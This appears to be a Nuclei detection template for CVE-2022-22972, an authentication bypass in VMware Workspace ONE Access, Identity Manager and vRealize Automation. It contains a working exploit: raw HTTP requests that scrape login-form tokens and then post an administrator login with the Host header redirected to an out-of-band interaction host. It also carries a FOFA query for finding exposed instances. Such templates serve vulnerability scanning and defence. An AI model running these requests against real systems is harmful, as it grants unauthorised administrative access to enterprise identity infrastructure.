id: CVE-2022-22972 info: name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass author: For3stCo1d,princechaddha severity: critical description: | VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. reference: - https://github.com/horizon3ai/CVE-2022-22972 - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive - https://www.vmware.com/security/advisories/VMSA-2022-0014.html - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22972 cwe-id: CWE-287 metadata: fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" tags: cve,cve2022,vmware,auth-bypass,oast requests: - raw: - | GET /vcac/ HTTP/1.1 Host: {{Hostname}} - | GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 Host: {{Hostname}} - | POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 Host: {{interactsh-url}} Content-type: application/x-www-form-urlencoded protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in host-redirects: true max-redirects: 3 cookie-reuse: true extractors: - type: regex part: body name: protected_state group: 1 regex: - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' internal: true - type: regex part: body name: horizonRelayState group: 1 regex: - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' internal: true - type: regex part: body name: userstore group: 1 regex: - 'id="userstore" value="([a-z.]+)" \/>' internal: true - type: regex part: body name: userstoreDisplay group: 1 regex: - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' internal: true - type: regex part: body name: stickyConnectorId group: 1 regex: - 'name="stickyConnectorId" value="(.*)"/>' internal: true - type: kval part: header name: HZN-Cookie kval: - 'HZN' matchers-condition: and matchers: - type: word part: header words: - "HZN=" - type: status status: - 302 - type: word part: interactsh_protocol words: - "http" # Enhanced by mp on 2022/06/01